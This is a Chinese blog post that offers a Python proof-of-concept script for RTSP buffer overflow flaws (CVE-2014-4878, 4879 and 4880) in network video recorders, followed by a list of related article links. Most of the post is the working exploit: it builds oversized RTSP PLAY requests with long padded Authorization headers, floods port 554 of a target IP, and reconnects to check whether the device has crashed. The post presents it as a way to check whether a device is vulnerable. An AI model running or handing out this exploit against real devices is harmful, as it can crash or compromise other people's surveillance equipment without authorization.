rtsp缓冲区漏洞攻击模拟

最新推荐文章于 2025-02-19 11:05:37 发布
最新推荐文章于 2025-02-19 11:05:37 发布
阅读量412 收藏 10
点赞数 5
文章标签: python java 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_30994477/article/details/142490456
版权

验证NVR是否存在rtsp缓冲区漏洞问题,可采用如下脚本,特此记录;

#!/usr/bin/env python

# coding: utf-8

import sys

import socket

from time import sleep

def cve20144878_poc(host,suffix):

    payload = 'PLAY rtsp://'+host+'/'+suffix+ ' RTSP/1.0\r\n'

    payload += 'CSeq: 7\r\n'

    payload += 'Authorization: Basic AAAAAAA\r\n'

    payload += 'Content-length: 3200\r\n\r\n'

    payload += 'A' * (13200)

    return payload

def cve20144879_poc(host,suffix):

    payload = 'PLAY rtsp://'+host+'/'+suffix+ ' RTSP/1.0\r\n'

    payload += 'Authorization'

    payload += 'A' * 1024

    payload += ': Basic AAAAAAA\r\n\r\n'

    return payload

def cve20144880_poc(host,suffix):

    payload = 'PLAY rtsp://'+host+'/'+suffix+ ' RTSP/1.0\r\n'

    payload += 'CSeq: 7\r\n'

    payload += 'Authorization: Basic '

    payload += 'A' * 2048

    payload += '\r\n\r\n'

    payload += 'B' * 1024

    return payload

def test_znv_pro(host,suffix):

    soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    try:

        soc.connect((host, 554))

    except socket.error:

         return False

    payload = 'PLAY rtsp://'+host+'/'+suffix+ ' RTSP/1.0\r\n'

    payload += 'CSeq: 7\r\n'

    payload += 'Authorization: Basic AAAAAAA\r\n'

    payload += 'Content-length: 3200\r\n\r\n'

    soc.send(payload);

    try:

        for i in range(1,1024*1024):

                if i%4 == 0:

                    sleep(1)

                soc.send('Z'*1024)

                print str(i)

    except socket.error:

        print 'error:%s' %socket.error

    soc.close();

    sleep(5)  # sleep to wait server crash

    soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    try:

         soc.connect((host, 554))

    except socket.error:

         return True

    return False

 #检验访问地址及端口是否存在   

def check_port_on(host):

    soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    check_target = (str(host), int(554))

    status = soc.connect_ex(check_target)

    print 'check_target' + str(check_target)

    if status == 0 :

        return True

    else:

        print 'status '+  str(status)

    return False

#检验目标设备是否存在内存漏洞问题

def check_vuln_exists(host, poc,suffix):

    print 'aaaa\n'

    soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    print 'def\n'

    try:

        soc.connect((host, 554))

    except socket.error:

        return False

    print 'abc\n'

    if poc == '1':

        payload = cve20144878_poc(host,suffix)

    elif poc == '2':

        payload = cve20144879_poc(host,suffix)

    else:

        payload = cve20144880_poc(host,suffix)

    

    print str(payload)

    soc.send(payload)

    soc.close()

    sleep(5)  # sleep to wait server crash

    soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    try:

        soc.connect((host, 554))

    except socket.error:

        return True

    return False

if __name__ == '__main__':

    target = "192.168.20.101"#sys.argv[1],攻击设备的IP地址

    suffix = "000100"#sys.argv[2],视频通道号

    poc_number = "4"#sys.argv[3],攻击内存块号?????

    if poc_number not in '1234':

        print 'Choose one POC.'

        sys.exit()

    print 'target:'+target

    print 'poc_number ' + poc_number

    if check_port_on(target):#检验访问地址是否存在

        if poc_number=='4':

            vuln_exists = True

            test_znv_pro(target,suffix)

        else:

            vuln_exists = check_vuln_exists(target, poc_number,suffix)

        

        if vuln_exists:

            print 'Target is vulnerable.'

        else:

            print 'Target may not be vulnerable.'

    else:

        print 'RTSP(port 554) closed'

qq_30994477
关注
RTSP未授权访问漏洞详解与防护手段
不忘初心,护天下安全!
08-25 3558
RTSP (Real Time Streaming Protocol),实时流协议,是一种应用层协议,专为流媒体使用。RTSP(Real Time Streaming Protocol),实时流传输协议,是TCP/IP协议体系中的一个应用层协议,该协议定义了一对多应用程序如何有效地通过IP网络传送多媒体数据,被广泛用于视频直播领域。为方便用户远程监控摄像头内容,许多摄像头厂商会在摄像头或 NVR 中开启 RTSP 服务器,用户可通过 VLC 等视频播放软件打开 rtsp 地址进行摄像头画面的实时查看。...
渗透测试2---软件安全测试知识体系
初遇我ㄖ寸の热情呢?
04-14 9313
软件质量特性: 1.功能性 2.性能 3.安全性 4.可靠性:大概就是软件运行多少时间不宕机,宕机的最少时间间隔是多少。可靠性是和服务等级挂钩的 5.可用性:易用性,不光是专业人员才会用。应该所有人都能容易上手 6.可修改性/扩展性 7.可变性(维护性):软件可以被修改的能力,随着平台的升级,软件要调整 8.互操作性:就是一个用户体验 软件安全测试: 软件安...
RTSP默认口令/弱口令漏洞
limb0的博客
11-04 1万+
RTSP 默认口令/弱口令漏洞 一、漏洞介绍 RTSP(Real Time Streaming Protocol),实时流传输协议,是TCP/IP协议体系中的一个应用层协议,该协议定义了一对多应用程序如何有效地通过IP网络传送多媒体数据,被广泛用于视频直播领域,为方便用户远程监控摄像头内容,许多摄像头厂商会在摄像头或NVR中开启RTSP服务器。 二、漏洞危害 攻击者可通过VLC等视频播放软件打开r...
RTSP视频传输平台EasyNVR安全扫描出现3DES漏洞修复方案
EasyNVR官方技术博客
06-22 582
EasyNVR视频平台支持开启https,https和http的区别之前介绍过,如果不知道如何开启,可以参考本文:EasyNVR硬件设备如何开启使用Https。在某个客户现场,客户开启了 https 接口访问程序,然后使用安全厂商提供的漏洞扫描工具,扫描对应的端口,出现了以下问题: 可以看到EasyNVR的安全扫描出现了3DES 漏洞。 https 由 http 协议和 tls 协议组成,其中 tls 在数据传递后,会使用对称密钥算法进行加密传输数据。使用的对称密钥算法,随着时间的过度,部分密钥算法
RTSP协议讲解及漏洞挖掘
最新发布
李火火的安全圈
02-19 916
实时流传输协议(Real Time Streaming Protocol,RTSP),RFC2326(中文版),是TCP/IP协议体系中的一个应用层协议,由哥伦比亚大学、网景和RealNetworks公司提交的IETF RFC标准。该协议定义了一对多应用程序如何有效地通过IP网络传送多媒体数据。RTSP在体系结构上位于RTP和RTCP之上,它使用TCP或UDP完成数据传输。
RTSP未授权访问漏洞
qq_68186313的博客
08-06 358
RTSP(Real Time Streaming Protocol),实时流传输协议,是TCP/IP协议体系中的一个应用层协议,该协议定义了一对多应用程序如何有效地通过IP网络传送多媒体数据,被广泛用于视频直播领域,为方便用户远程监控摄像头内容,许多摄像头厂商会在摄像头或VR中开启RTSP服务器。攻击者可通过VLC等视频播放软件打开rtsp地址进行摄像头画面的实时查看。1、使用以下语句在Fofa上进行资产收集。
RTSP/Onvif安防视频监控平台EasyNVR漏洞扫描及解决方法
EasyNVR官方技术博客
01-16 976
视频监控平台EasyNVR基于RTSP/Onvif协议,支持轻量化接入大量前端监控设备,并实现对现场的实时监控。
RTSP协议实现中的常见错误与解决方法
RTSP协议简介 ## 1.1 什么是RTSP协议? RTSP(Real-Time Streaming Protocol)是一种用于实时流媒体传输的网络协议。RTSP允许客户端通过网络与服务器进行交互,实现流媒体的控制、回放、录制等功能。RTSP协议的...
【流媒体传输高效秘籍】:8种技巧提升rtsp视频流传输效率
本文从流媒体传输基础和RTSP协议出发,探讨了影响流媒体传输效率的关键因素,包括网络带宽和延迟、编码格式与压缩效率、以及传输协议的优化。接着,文章深入分析了流媒体服务器的配置与调优策略,强调了硬件选择和...
软件设计师刷题与知识点总结 笔记-2
php的绯闻女友
04-26 2170
5.系统开发与运行 2021年3月8日 概述:软件维护是软件生命周期中的最后一个阶段,处于系统投入生产性运行以后的时期中,因此不属于系统开发过程。软件维护是在软件已经交付使用之后为了改正错误或满足新的需求而修改软件的的过程,即软件在交付使用后对软件所做的一切改动。 题目:在软件维护阶段,为软件的运行增加监控设施属于__维护 A.改正性 B.适应性 C.完善性 D.预防性 解析:本题考查软件维护技术。在软件开发完成交付用户使用后,就进入软件运行/维护...
通过RTSP协议捕获大华摄像机视频
11-18
Opencv3通过RTSP协议捕获大华摄像头视频,在VisualStudio 2017 下编译通过
红队攻防渗透技术实战流程:红队目标信息收集之基础资产信息收集
HACKONE的博客
03-23 1895
在红队渗透测试中,客户的合作至关重要,他们会提供目标资产的基本信息作为初始攻击面。红队的行动范围通常是由客户明确授权界定的,这其中包括但不限于对主域名、下属子公司以及整个供应链体系中的相关资产进行安全测试。红队需严格按照约定的边界执行任务,可能涵盖但不限于对主域名下的各个子域名进行深度侦查,探究子公司间的网络互联情况,以及深入分析供应链各环节的软硬件设施、业务流程和数据交换点,以全方位评估和模拟真实攻击场景下的安全风险。在执行过程中,红队始终保持专业操守,确保所有行动均在合法、合规的前提下进行,并以增强客户
RTSP协议全面解析
hello.reader
10-19 4221
实时流传输协议(Real-Time Streaming Protocol,简称RTSP)是一种应用层协议,专门用于控制多媒体流的传输。RTSP的主要作用是管理流媒体的连接和控制操作,比如播放、暂停和停止,而实际的媒体传输通常由RTP(Real-time Transport Protocol)或其他协议来完成。RTSP本身并不处理媒体内容的编码或解码工作,而是用于定义如何在客户端与服务器之间建立和控制媒体流会话。
各种未授权访问漏洞的复现与利用
Shanfenglan's blog
11-30 1413
文章目录1. rsync1.1 利用1. 下载文件2. 上传文件3. 上传文件拿shell2. Jupyter Noteboo2.1 利用3. hadoop3.1 利用4. CouchDB4.1 利用参考文章 1. rsync Rsync(remote synchronize)是一个远程数据同步工具,可通过 LAN/WAN 快速同步多台主机间的文件,也可以同步本地硬盘中的不同目录。Rsync 默认允许匿名访问,如果在配置文件中没有相关的用户认证以及文件授权,就会触发隐患。Rsync 的默认端口为 837。
海康威视(Hikvision)大规模代码执行漏洞 数万监控设备存风险
热门推荐
一点一滴积累!
04-01 3万+
1. 更新情况 2014年11月19日,海康威视(Hikvision)监控设备被爆严重漏洞,具体编号为CVE-2014-4878、CVE-2014-4879和CVE-2014-4880。这三个漏洞都是由于Hikvision监控设备对RTSP(实时流传输协议)请求处理不当导致的,通过该漏洞攻击者可以对设备进行DoS,甚至直接获取设备的最高权限。2. 漏洞概要 a) 漏洞描述 海
RTSP协议介绍
xietianhe的专栏
06-20 483
1. 实 时流协议RTSPRTSP[3]协 议以客户服务器方式工作,它是一个多媒体播放控制协议,用来使用户在播放从因特网下载的实时数据时能够进行控制,如:暂停/继 续、后退、前进等。因此 RTSP 又称为“因特网录像机遥控协议”。1.1.   RTSP协 议简介要 实现 RTSP 的控制功能,不仅要有协议,而且要有专门的媒体播放器(media pla
RTSP存在弱口令
maverickpig的博客
01-14 2800
RTSP存在弱口令 RTSP协议 RTSP(Real-Time Stream Protocol)协议是一个基于文本的多媒体播放控制协议,属于应用层。RTSP以客户端方式工作,对流媒体提供播放、暂停、后退、前进等操作。该标准由IETF指定,对应的协议是RFC2326。 RTSP传输的一般是TS、MP4格式的流,其传输一般需要2~3个通道,命令和数据通道分离。使用RTSP协议传输流媒体数据需要有专门的媒体播放器和媒体服务器,也就是需要支持RTSP协议的客户端和服务器。 这里实用的RTSP客户端为VLC medi
网络摄像头CVE
weixin_30445169的博客
06-17 1171
CVE-2018-9995 rtsp未授权访问 rtsp后缀整理: Axis(安讯士) rtsp:// 192.168.200.202/axis-media/media.amp?videocodec=h264&resolution=1280x720 rtsp://IP地址/mpeg4/media.amp rtsp://IP地址/安迅士/AXIS-media/media....
RTSP协议(18)——安全注意事项(RFC2326)
CrystalGabrielle的博客
05-26 828
RTSP协议(18)——安全注意事项 原文第十六章 由于RTSP服务器和HTTP服务器之间的语法和用法相似,因此[H15]中概述的安全考虑因素适用。具体而言,请注意以下内容: Authentication Mechanisms:RTSP和HTTP共享共同的身份验证方案,因此在身份验证方面应该遵循相同的规定。有关客户端身份验证问题,请参阅[H15.1],有关支持多种身份验证机制的问题,请参阅[H15.2]。 Abuse of Server Log Information:RTSP和HTTP服务器可能具有类似
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值